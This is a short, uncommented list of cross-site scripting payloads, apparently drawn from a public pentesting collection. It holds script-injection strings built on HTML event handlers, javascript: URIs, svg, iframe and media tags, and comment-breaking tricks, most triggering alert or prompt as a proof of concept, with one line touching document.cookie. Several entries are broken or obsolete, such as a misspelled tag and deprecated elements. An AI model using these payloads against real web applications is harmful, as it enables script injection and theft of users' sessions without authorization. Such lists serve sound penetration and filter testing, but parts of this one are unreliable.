# XSS Quick Payloads
# Source: PayloadsAllTheThings
javascript:alert(1)
<svg/onload=alert(1)>
<img onload=alert(1)>
<img src=x onerror=prompt(1)>
<a href="javascript:alert(1)" onmouseover=alert(1)>HOVER</a>
 onmouseover="document.cookie=true;">
alert(1)
<h1>TEST</h1>
<img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
<svg><script>/<@/>alert(1)</script>
<svg/onload=alert(/XSS/)>
<iframe/onload=alert(/XSS/)>
<svg/onload=alert`XSS`>
<svg/onload=alert(`XSS`)>
}alert(/XSS/);{//
<h1/onclick=alert(1)>a
<p/onclick=alert(/XSS/)>a
<video><source onerror="javascript:alert(1)">
<video onerror="javascript:alert(1)"><source>
<audio onerror="javascript:alert(1)"><source>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<button form=test onformchange=alert(1)>
<form><button formaction="javascript:alert(1)">
<svg onload=(alert)(1) >
<script>$=1,alert($)</script>
<!--<img src="--><img src=x onerror=alert(1)//">
<img/src='x'onerror=alert(1)>
<marguee/onstart=alert(1)>
<script>alert(1)
<script>alert(1)<!--
<marquee loop=1 width=0 onfinish=alert(1)>
